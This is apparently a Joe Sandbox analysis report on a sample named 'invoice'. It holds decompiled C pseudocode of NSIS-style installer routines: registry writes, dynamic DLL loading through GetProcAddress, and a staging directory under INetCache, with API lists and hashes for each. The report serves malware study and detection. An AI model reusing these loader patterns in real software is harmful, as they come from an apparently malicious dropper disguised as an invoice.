                                            • Instruction Fuzzy Hash: B0F082363042086BDB108F66DD04B9B7BA9DF91750F14803BFA48AA280D6B4E9588799
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 725 100016bd-100016f9 call 10001a5d 729 1000180a-1000180c 725->729 730 100016ff-10001703 725->730 731 10001705-1000170b call 100021b0 730->731 732 1000170c-10001719 call 100021fa 730->732 731->732 737 10001749-10001750 732->737 738 1000171b-10001720 732->738 739 10001770-10001774 737->739 740 10001752-1000176e call 100023d8 call 10001559 call 10001266 GlobalFree 737->740 741 10001722-10001723 738->741 742 1000173b-1000173e 738->742 745 100017b2-100017b8 call 100023d8 739->745 746 10001776-100017b0 call 10001559 call 100023d8 739->746 766 100017b9-100017bd 740->766 743 10001725-10001726 741->743 744 1000172b-1000172c call 100027e4 741->744 742->737 747 10001740-10001741 call 10002a9f 742->747 750 10001733-10001739 call 10002587 743->750 751 10001728-10001729 743->751 757 10001731 744->757 745->766 746->766 760 10001746 747->760 765 10001748 750->765 751->737 751->744 757->760 760->765 765->737 769 100017fa-10001801 766->769 770 100017bf-100017cd call 1000239e 766->770 769->729 773 10001803-10001804 GlobalFree 769->773 775 100017e5-100017ec 770->775 776 100017cf-100017d2 770->776 773->729 775->769 778 100017ee-100017f9 call 100014e2 775->778 776->775 777 100017d4-100017dc 776->777 777->775 779 100017de-100017df FreeLibrary 777->779 778->769 779->775
                                            C-Code - Quality: 94%
                                            			E100016BD(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                            				void _v36;
                                            				struct HINSTANCE__* _t34;
                                            				intOrPtr _t38;
                                            				void* _t44;
                                            				void* _t45;
                                            				void* _t46;
                                            				void* _t50;
                                            				intOrPtr _t53;
                                            				signed int _t57;
                                            				signed int _t61;
                                            				void* _t65;
                                            				void* _t66;
                                            				void* _t70;
                                            				void* _t74;
                                            
                                            				_t74 = __esi;
                                            				_t66 = __edi;
                                            				_t65 = __edx;
                                            				 *0x1000405c = _a8;
                                            				 *0x10004060 = _a16;
                                            				 *0x10004064 = _a12;
                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556);
                                            				_push("true"); // executed
                                            				_t34 = E10001A5D(); // executed
                                            				_t50 = _t34;
                                            				if(_t50 == 0) {
                                            					L28:
                                            					return _t34;
                                            				} else {
                                            					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                            						E100021B0(_t50);
                                            					}
                                            					E100021FA(_t65, _t50);
                                            					_t53 =  *((intOrPtr*)(_t50 + 4));
                                            					if(_t53 == 0xffffffff) {
                                            						L14:
                                            						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
                                            							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                            								_t34 = E100023D8(_t50);
                                            							} else {
                                            								_push(_t74);
                                            								_push(_t66);
                                            								_t12 = _t50 + 0x818; // 0x818
                                            								_t57 = 8;
                                            								memcpy( &_v36, _t12, _t57 << 2);
                                            								_t38 = E10001559(_t50);
                                            								_t15 = _t50 + 0x818; // 0x818
                                            								_t70 = _t15;
                                            								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
                                            								 *_t70 = 3;
                                            								E100023D8(_t50);
                                            								_t61 = 8;
                                            								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                            							}
                                            						} else {
                                            							E100023D8(_t50);
                                            							_t34 = GlobalFree(E10001266(E10001559(_t50)));
                                            						}
                                            						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                            							_t34 = E1000239E(_t50);
                                            							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
                                            								_t34 =  *(_t50 + 0x808);
                                            								if(_t34 != 0) {
                                            									_t34 = FreeLibrary(_t34);
                                            								}
                                            							}
                                            							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
                                            								_t34 = E100014E2( *0x10004058);
                                            							}
                                            						}
                                            						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
                                            							goto L28;
                                            						} else {
                                            							return GlobalFree(_t50);
                                            						}
                                            					}
                                            					_t44 =  *_t50;
                                            					if(_t44 == 0) {
                                            						if(_t53 != 1) {
                                            							goto L14;
                                            						}
                                            						E10002A9F(_t50);
                                            						L12:
                                            						_t50 = _t44;
                                            						L13:
                                            						goto L14;
                                            					}
                                            					_t45 = _t44 - 1;
                                            					if(_t45 == 0) {
                                            						L8:
                                            						_t44 = E100027E4(_t53, _t50); // executed
                                            						goto L12;
                                            					}
                                            					_t46 = _t45 - 1;
                                            					if(_t46 == 0) {
                                            						E10002587(_t50);
                                            						goto L13;
                                            					}
                                            					if(_t46 != 1) {
                                            						goto L14;
                                            					}
                                            					goto L8;
                                            				}
                                            			}


















                                            APIs
                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                            • GlobalFree.KERNEL32(00000000), ref: 10001768
                                            • FreeLibrary.KERNEL32(?), ref: 100017DF
                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                              • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                              • Part of subcall function 10002587: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025F9
                                              • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,10004010,00000000,10001695,00000000), ref: 10001572
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_10000000_invoice.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                            • String ID:
                                            • API String ID: 1791698881-3916222277
                                            • Opcode ID: 87444a894296e8d40cc63a4c2e1c416a7af340e3bff12e61cd27f34ad68e5005
                                            • Instruction ID: 474564f2ddd1a30fda7ef2e88bb39d7445f8f4f5c00c78564696995dcbc9c57a
                                            • Opcode Fuzzy Hash: 87444a894296e8d40cc63a4c2e1c416a7af340e3bff12e61cd27f34ad68e5005
                                            • Instruction Fuzzy Hash: C4319E79408205DAFB41DF649CC5BCA37ECFB042D5F118465FA0A9A09EDF78A8858B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 782 4023d0-402401 call 402ac1 * 2 call 402b51 789 402951-402960 782->789 790 402407-402411 782->790 791 402421-402424 790->791 792 402413-402420 call 402ac1 lstrlenA 790->792 795 402426-402437 call 402a9f 791->795 796 402438-40243b 791->796 792->791 795->796 800 40244c-402460 RegSetValueExA 796->800 801 40243d-402447 call 402f81 796->801 804 402462 800->804 805 402465-402542 RegCloseKey 800->805 801->800 804->805 805->789 807 402716-40271d 805->807 807->789
                                            C-Code - Quality: 83%
                                            			E004023D0(void* __eax, int __ebx, intOrPtr __edx) {
                                            				void* _t18;
                                            				void* _t19;
                                            				int _t22;
                                            				long _t23;
                                            				int _t28;
                                            				intOrPtr _t31;
                                            				void* _t32;
                                            				intOrPtr _t35;
                                            				void* _t37;
                                            				void* _t40;
                                            
                                            				_t31 = __edx;
                                            				_t28 = __ebx;
                                            				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                            				_t32 = __eax;
                                            				 *(_t37 - 0x3c) =  *(_t37 - 0x14);
                                            				 *(_t37 - 0x34) = E00402AC1(2);
                                            				_t18 = E00402AC1(0x11);
                                            				 *(_t37 - 4) = 1;
                                            				_t19 = E00402B51(_t40, _t32, _t18, 2); // executed
                                            				 *(_t37 + 8) = _t19;
                                            				if(_t19 != __ebx) {
                                            					_t22 = 0;
                                            					if(_t35 == 1) {
                                            						E00402AC1(0x23);
                                            						_t22 = lstrlenA(0x40ac18) + 1;
                                            					}
                                            					if(_t35 == 4) {
                                            						 *0x40ac18 = E00402A9F(3);
                                            						 *((intOrPtr*)(_t37 - 0x80)) = _t31;
                                            						_t22 = _t35;
                                            					}
                                            					if(_t35 == 3) {
                                            						_t22 = E00402F81( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40ac18, 0xc00);
                                            					}
                                            					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t28,  *(_t37 - 0x3c), 0x40ac18, _t22); // executed
                                            					if(_t23 == 0) {
                                            						 *(_t37 - 4) = _t28;
                                            					}
                                            					_push( *(_t37 + 8));
                                            					RegCloseKey();
                                            				}
                                            				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
                                            				return 0;
                                            			}














                                            APIs
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nstA9F8.tmp,00000023,00000011,00000002), ref: 0040241B
                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nstA9F8.tmp,00000000,00000011,00000002), ref: 00402458
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA9F8.tmp,00000000,00000011,00000002), ref: 0040253C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp
                                            • API String ID: 2655323295-1192468162
                                            • Opcode ID: 0b155a889f0a1852a4c8b5c80891aed8b0995d715a5fa6eccbfd1d5d818aefb1
                                            • Instruction ID: f3bc197a49376025d104d1766b7c26e04d62aafcfa214307c08bf0afb556c6f3
                                            • Opcode Fuzzy Hash: 0b155a889f0a1852a4c8b5c80891aed8b0995d715a5fa6eccbfd1d5d818aefb1
                                            • Instruction Fuzzy Hash: AD117271F00215BEDF10AFA59E89A9E7A74DB54314F20403AF908B61D1CAB84D419B68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E00401FFD(void* __ebx, void* __eflags) {
                                            				struct HINSTANCE__* _t18;
                                            				struct HINSTANCE__* _t26;
                                            				void* _t27;
                                            				struct HINSTANCE__* _t30;
                                            				CHAR* _t32;
                                            				intOrPtr* _t33;
                                            				void* _t34;
                                            
                                            				_t27 = __ebx;
                                            				asm("sbb eax, 0x42f4d8");
                                            				 *(_t34 - 4) = 1;
                                            				if(__eflags < 0) {
                                            					_push(0xffffffe7);
                                            					L15:
                                            					E00401423();
                                            					L16:
                                            					 *0x42f4a8 =  *0x42f4a8 +  *(_t34 - 4);
                                            					return 0;
                                            				}
                                            				_t32 = E00402AC1(0xfffffff0);
                                            				 *(_t34 + 8) = E00402AC1("true");
                                            				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                            					L3:
                                            					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                            					_t30 = _t18;
                                            					if(_t30 == _t27) {
                                            						_push(0xfffffff6);
                                            						goto L15;
                                            					}
                                            					L4:
                                            					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                            					if(_t33 == _t27) {
                                            						E0040508C(0xfffffff7,  *(_t34 + 8));
                                            					} else {
                                            						 *(_t34 - 4) = _t27;
                                            						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                            							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b81c, 0x40a000); // executed
                                            						} else {
                                            							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                            							if( *_t33() != 0) {
                                            								 *(_t34 - 4) = 1;
                                            							}
                                            						}
                                            					}
                                            					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403755(_t30) != 0) {
                                            						FreeLibrary(_t30); // executed
                                            					}
                                            					goto L16;
                                            				}
                                            				_t26 = GetModuleHandleA(_t32); // executed
                                            				_t30 = _t26;
                                            				if(_t30 != __ebx) {
                                            					goto L4;
                                            				}
                                            				goto L3;
                                            			}











                                            APIs
                                            • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00402028
                                              • Part of subcall function 0040508C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                              • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                              • Part of subcall function 0040508C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,004030DC,004030DC,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,0041C028,767923A0), ref: 004050E8
                                              • Part of subcall function 0040508C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll), ref: 004050FA
                                              • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                              • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                              • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402038
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                            • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 004020B2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: 344385d6562e94f53280d8f746c1f287a273f2558a62102750f58fdb2a953ff5
                                            • Instruction ID: 3b54ba627a5d3606a08c88bc2c88048367fe0e0edc5ddf34d35ff9eabd327fef
                                            • Opcode Fuzzy Hash: 344385d6562e94f53280d8f746c1f287a273f2558a62102750f58fdb2a953ff5
                                            • Instruction Fuzzy Hash: A721DB71A04225ABCF207FA48E49B6E7670AB14358F20413BFB11B62D0CBBD4942966E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E004015BB(char __ebx, void* __eflags) {
                                            				void* _t13;
                                            				int _t19;
                                            				char _t21;
                                            				void* _t22;
                                            				char _t23;
                                            				signed char _t24;
                                            				char _t26;
                                            				CHAR* _t28;
                                            				char* _t32;
                                            				void* _t33;
                                            
                                            				_t26 = __ebx;
                                            				_t28 = E00402AC1(0xfffffff0);
                                            				_t13 = E00405996(_t28);
                                            				_t30 = _t13;
                                            				if(_t13 != __ebx) {
                                            					do {
                                            						_t32 = E00405928(_t30, 0x5c);
                                            						_t21 =  *_t32;
                                            						 *_t32 = _t26;
                                            						 *((char*)(_t33 + 0xb)) = _t21;
                                            						if(_t21 != _t26) {
                                            							L5:
                                            							_t22 = E004055CF(_t28);
                                            						} else {
                                            							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                            							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004055EC(_t39) == 0) {
                                            								goto L5;
                                            							} else {
                                            								_t22 = E00405552(_t28); // executed
                                            							}
                                            						}
                                            						if(_t22 != _t26) {
                                            							if(_t22 != 0xb7) {
                                            								L9:
                                            								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                            							} else {
                                            								_t24 = GetFileAttributesA(_t28); // executed
                                            								if((_t24 & 0x00000010) == 0) {
                                            									goto L9;
                                            								}
                                            							}
                                            						}
                                            						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                            						 *_t32 = _t23;
                                            						_t30 = _t32 + 1;
                                            					} while (_t23 != _t26);
                                            				}
                                            				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                            					_push(0xfffffff5);
                                            					E00401423();
                                            				} else {
                                            					E00401423(0xffffffe6);
                                            					E00405F65("C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository\\Diskofils\\Justiciaryship", _t28);
                                            					_t19 = SetCurrentDirectoryA(_t28); // executed
                                            					if(_t19 == 0) {
                                            						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                            					}
                                            				}
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
                                            				return 0;
                                            			}














                                            APIs
                                              • Part of subcall function 00405996: CharNextA.USER32(?,?,0042BC78,?,00405A02,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
                                              • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                                              • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                              • Part of subcall function 00405552: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship,00000000,00000000,000000F0), ref: 0040163C
                                            Strings
                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship, xrefs: 00401631
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship
                                            • API String ID: 1892508949-1385751471
                                            • Opcode ID: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
                                            • Instruction ID: 323619fe81b3529d61600e1e0eff0ce417d4ac591c1c2d39a63079fc07480124
                                            • Opcode Fuzzy Hash: 6e9d8b0bdd6535f5ad521cfe25d2546e39bd3477eb11d702e3e3618c9b95e55c
                                            • Instruction Fuzzy Hash: 2B11C431608152EBCB217BA54D415BF2AB4DA96324B28093FE9D1B22E2D63D4D425A2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00405E4C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                            				int _v8;
                                            				long _t21;
                                            				long _t24;
                                            				char* _t30;
                                            
                                            				asm("sbb eax, eax");
                                            				_v8 = 0x400;
                                            				_t21 = E00405DEB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                            				_t30 = _a16;
                                            				if(_t21 != 0) {
                                            					L4:
                                            					 *_t30 =  *_t30 & 0x00000000;
                                            				} else {
                                            					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                            					_t21 = RegCloseKey(_a20);
                                            					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                            						goto L4;
                                            					}
                                            				}
                                            				return _t21;
                                            			}








                                            APIs
                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406090,80000002), ref: 00405E92
                                            • RegCloseKey.ADVAPI32(?,?,00406090,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll), ref: 00405E9D
                                            Strings
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: Call
                                            • API String ID: 3356406503-1824292864
                                            • Opcode ID: 792f73651c5f0961c7d778f0fa8b648c5274768340d5a4a072e3937443cccb1f
                                            • Instruction ID: 9bec2c93df88531f10cf132d6bbbb6393b4a4aad9e102c5e2669e285c315f56d
                                            • Opcode Fuzzy Hash: 792f73651c5f0961c7d778f0fa8b648c5274768340d5a4a072e3937443cccb1f
                                            • Instruction Fuzzy Hash: B7015A72500619ABEF228F61CD09FDB3BACEF55365F00802AF955A2191D378DA54CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 26%
                                            			E100027E4(void* __ecx, intOrPtr _a4) {
                                            				signed int _v8;
                                            				void* _t31;
                                            				void* _t32;
                                            				int _t36;
                                            				void* _t40;
                                            				void* _t49;
                                            				void* _t54;
                                            				void* _t58;
                                            				signed int _t65;
                                            				void* _t70;
                                            				void* _t79;
                                            				intOrPtr _t81;
                                            				signed int _t88;
                                            				intOrPtr _t90;
                                            				intOrPtr _t91;
                                            				void* _t92;
                                            				void* _t94;
                                            				void* _t100;
                                            				void* _t101;
                                            				void* _t102;
                                            				void* _t103;
                                            				intOrPtr _t106;
                                            				intOrPtr _t107;
                                            
                                            				if( *0x10004040 != 0 && E10002765(_a4) == 0) {
                                            					 *0x10004044 = _t106;
                                            					if( *0x1000403c != 0) {
                                            						_t106 =  *0x1000403c;
                                            					} else {
                                            						E10002D20(E1000275F(), __ecx);
                                            						 *0x1000403c = _t106;
                                            					}
                                            				}
                                            				_t31 = E100027A1(_a4);
                                            				_t107 = _t106 + 4;
                                            				if(_t31 <= 0) {
                                            					L9:
                                            					_t32 = E10002795();
                                            					_t81 = _a4;
                                            					_t90 =  *0x10004048;
                                            					 *((intOrPtr*)(_t32 + _t81)) = _t90;
                                            					 *0x10004048 = _t81;
                                            					E1000278F();
                                            					_t36 = EnumResourceTypesA(??, ??, ??); // executed
                                            					 *0x1000401c = _t36;
                                            					 *0x10004020 = _t90;
                                            					if( *0x10004040 != 0 && E10002765( *0x10004048) == 0) {
                                            						 *0x1000403c = _t107;
                                            						_t107 =  *0x10004044;
                                            					}
                                            					_t91 =  *0x10004048;
                                            					_a4 = _t91;
                                            					 *0x10004048 =  *((intOrPtr*)(E10002795() + _t91));
                                            					_t40 = E10002773(_t91);
                                            					_pop(_t92);
                                            					if(_t40 != 0) {
                                            						_t49 = E100027A1(_t92);
                                            						if(_t49 > 0) {
                                            							_push(_t49);
                                            							_push(E100027AC() + _a4 + _v8);
                                            							_push(E100027B6());
                                            							if( *0x10004040 <= 0 || E10002765(_a4) != 0) {
                                            								_pop(_t101);
                                            								_pop(_t54);
                                            								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
                                            								}
                                            								asm("loop 0xfffffff5");
                                            							} else {
                                            								_pop(_t102);
                                            								_pop(_t58);
                                            								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
                                            								asm("loop 0xffffffeb");
                                            							}
                                            						}
                                            					}
                                            					if( *0x10004048 == 0) {
                                            						 *0x1000403c = 0;
                                            					}
                                            					_t94 = _a4 + E100027AC();
                                            					 *(E100027BA() + _t94) =  *0x1000401c;
                                            					 *((intOrPtr*)(E100027BE() + _t94)) =  *0x10004020;
                                            					E100027CE(_a4);
                                            					if(E10002781() != 0) {
                                            						 *0x10004058 = GetLastError();
                                            					}
                                            					return _a4;
                                            				}
                                            				_push(E100027AC() + _a4);
                                            				_t65 = E100027B2();
                                            				_v8 = _t65;
                                            				_t88 = _t31;
                                            				_push(_t77 + _t65 * _t88);
                                            				_t79 = E100027BE();
                                            				_t100 = E100027BA();
                                            				_t103 = E100027B6();
                                            				_t70 = _t88;
                                            				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
                                            					_push( *((intOrPtr*)(_t79 + _t70)));
                                            				}
                                            				_push( *((intOrPtr*)(_t100 + _t70)));
                                            				asm("loop 0xfffffff1");
                                            				goto L9;
                                            			}



























                                            APIs
                                            • EnumResourceTypesA.KERNEL32(00000000), ref: 100028A3
                                            • GetLastError.KERNEL32 ref: 100029AA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_10000000_invoice.jbxd
                                            Similarity
                                            • API ID: EnumErrorLastResourceTypes
                                            • String ID:
                                            • API String ID: 1485949383-0
                                            • Opcode ID: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
                                            • Instruction ID: 7088a7f0c219bdfd589eed4d744adbaf06b55c7882bf085a68ef70f7e309f44b
                                            • Opcode Fuzzy Hash: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
                                            • Instruction Fuzzy Hash: 385194BA908215DFF711EF60D9C575937A8EB443E0F21842AEA08E721DDF34A9818B55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E0040246D(int* __ebx, char* __esi) {
                                            				void* _t17;
                                            				char* _t18;
                                            				long _t21;
                                            				void* _t33;
                                            				void* _t37;
                                            				void* _t40;
                                            
                                            				_t35 = __esi;
                                            				_t27 = __ebx;
                                            				_t17 = E00402B01(_t40, 0x20019); // executed
                                            				_t33 = _t17;
                                            				_t18 = E00402AC1(0x33);
                                            				 *__esi = __ebx;
                                            				if(_t33 == __ebx) {
                                            					 *(_t37 - 4) = 1;
                                            				} else {
                                            					 *(_t37 - 0x3c) = 0x400;
                                            					_t21 = RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x3c); // executed
                                            					if(_t21 != 0) {
                                            						L7:
                                            						 *_t35 = _t27;
                                            						 *(_t37 - 4) = 1;
                                            					} else {
                                            						if( *(_t37 + 8) == 4) {
                                            							__eflags =  *(_t37 - 0x18) - __ebx;
                                            							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                            							E00405EC3(__esi,  *__esi);
                                            						} else {
                                            							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                            								 *(_t37 - 4) =  *(_t37 - 0x18);
                                            								_t35[0x3ff] = _t27;
                                            							} else {
                                            								goto L7;
                                            							}
                                            						}
                                            					}
                                            					_push(_t33);
                                            					RegCloseKey();
                                            				}
                                            				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
                                            				return 0;
                                            			}










                                            APIs
                                            • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040249D
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA9F8.tmp,00000000,00000011,00000002), ref: 0040253C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
